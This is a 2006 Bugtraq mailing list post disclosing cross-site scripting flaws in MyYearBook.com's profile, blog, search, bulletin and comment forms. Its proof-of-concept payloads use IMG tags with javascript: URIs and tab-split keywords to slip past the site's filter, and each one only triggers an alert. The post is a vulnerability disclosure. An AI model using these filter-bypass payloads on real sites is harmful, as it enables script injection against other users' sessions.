[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
MyYearBook.com - XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: MyYearBook.com - XSS
- From: luny@xxxxxxxxxxxxxxx
- Date: 25 May 2006 23:21:25 -0000
MyYearBook.com - Personal community site like myspace.com
Effected files:
Input forms of:
editing profile
posting a blog
search boxes
posting a bulletin
posting a comment
---------------------------
XSS Vulnerabilities proof of concept:
When editing your profile, it seems <script> tags are filtered to <notallowed>
tags, and javascript is filtered to the word not allowed. To by pass this we
can convert the script tags or the word javascript by using hex encoding. Below
are following examples of places where user submitted data isn't properlly
filtered before being dynamically generated.
Profile input:
All the user has to do is put the following in any input box in his profile:
<IMG
SRC=javascript:alert('XSS')>
Blog subject input:
<IMG SRC="jav	ascript:alert('XSS');">
Photo caption input:
Same as above.
<IMG SRC="jav	ascript:alert('XSS');">
Any search box input:
"><IMG SRC="jav	ascript:alert('XSS');"><"
Posting a bulletin input:
In the message input box the following works:
<IMG
SRC=javascript:alert('XSS')>
Posting a comment:
<IMG SRC="jav ascript:alert('XSS');">
Make sure tab is enabled.
------------------------------------------------
Luny - http://www.youfucktard.com